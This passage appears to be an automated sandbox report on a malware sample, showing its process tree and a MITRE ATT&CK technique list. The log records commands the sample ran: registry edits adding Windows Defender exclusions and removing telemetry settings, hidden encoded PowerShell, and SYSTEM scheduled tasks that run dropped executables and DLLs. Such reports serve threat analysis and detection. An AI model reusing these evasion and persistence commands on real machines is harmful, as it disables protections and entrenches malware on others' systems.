    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\WOJEBgcpJeoAyOioJ /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HvrIGoRDYaykjTnO /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\HvrIGoRDYaykjTnO /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2820
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gDnPTnSkb" /SC once /ST 11:17:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:3384
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gDnPTnSkb"
  2⤵
  PID:5896
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gDnPTnSkb"
  2⤵
  PID:5748
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LMrvZmpowwChRBgra" /SC once /ST 08:58:23 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HvrIGoRDYaykjTnO\SjRiIsSUwUNWXxF\IbyOOzs.exe\" fX /site_id 525403 /S" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4576
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "LMrvZmpowwChRBgra"
  2⤵
  PID:1808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 4148 -ip 4148
1⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4828
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:4368

C:\Windows\Temp\HvrIGoRDYaykjTnO\SjRiIsSUwUNWXxF\IbyOOzs.exe
C:\Windows\Temp\HvrIGoRDYaykjTnO\SjRiIsSUwUNWXxF\IbyOOzs.exe fX /site_id 525403 /S
1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:4988
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bnkqNuphAZeBTHhYMc"
  2⤵
  PID:2128
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:4176
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:1916
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:460
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:5608
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wjTkFrExU\UukAkJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "WcTeBRgOXLrCFSZ" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:5352
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "WcTeBRgOXLrCFSZ2" /F /xml "C:\Program Files (x86)\wjTkFrExU\aftshtn.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4356
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "WcTeBRgOXLrCFSZ"
  2⤵
  PID:4760
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "WcTeBRgOXLrCFSZ"
  2⤵
  PID:5256
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "DhyhGOYkHLcwyL" /F /xml "C:\Program Files (x86)\bQZEOuyekqRU2\tiwkFfV.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:3464
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xuGNGpMfuIDWg2" /F /xml "C:\ProgramData\ZvEHJNdJDJxIeVVB\IwwccdT.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1316
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FPfgiItdWHGuoXXpQ2" /F /xml "C:\Program Files (x86)\uAhcATovcXckvYCnvyR\QQyeJnA.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4888
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "fvgavqrnEnHHROaNgGs2" /F /xml "C:\Program Files (x86)\GuXKuCyCeSmjC\JbtXKws.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:4388
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "pyIEiyMuPIzAvWAZz" /SC once /ST 07:08:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\HvrIGoRDYaykjTnO\PRSARnln\rIPpHFk.dll\",#1 /site_id 525403" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:4948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "pyIEiyMuPIzAvWAZz"
  2⤵
  PID:3204
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:3672
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:3984
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:1664
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:2508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "LMrvZmpowwChRBgra"
  2⤵
  PID:5980

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HvrIGoRDYaykjTnO\PRSARnln\rIPpHFk.dll",#1 /site_id 525403
1⤵
PID:4308
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\HvrIGoRDYaykjTnO\PRSARnln\rIPpHFk.dll",#1 /site_id 525403
  2⤵
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  PID:1404
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "pyIEiyMuPIzAvWAZz"
    3⤵
    PID:5796

C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
1⤵
- Checks processor information in registry
PID:4716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p
1⤵
PID:5508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p
1⤵
PID:4668

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1816

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1548

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
1⤵
PID:4228

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1392

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p
1⤵
PID:396

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Scheduled Task

Defense Evasion

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery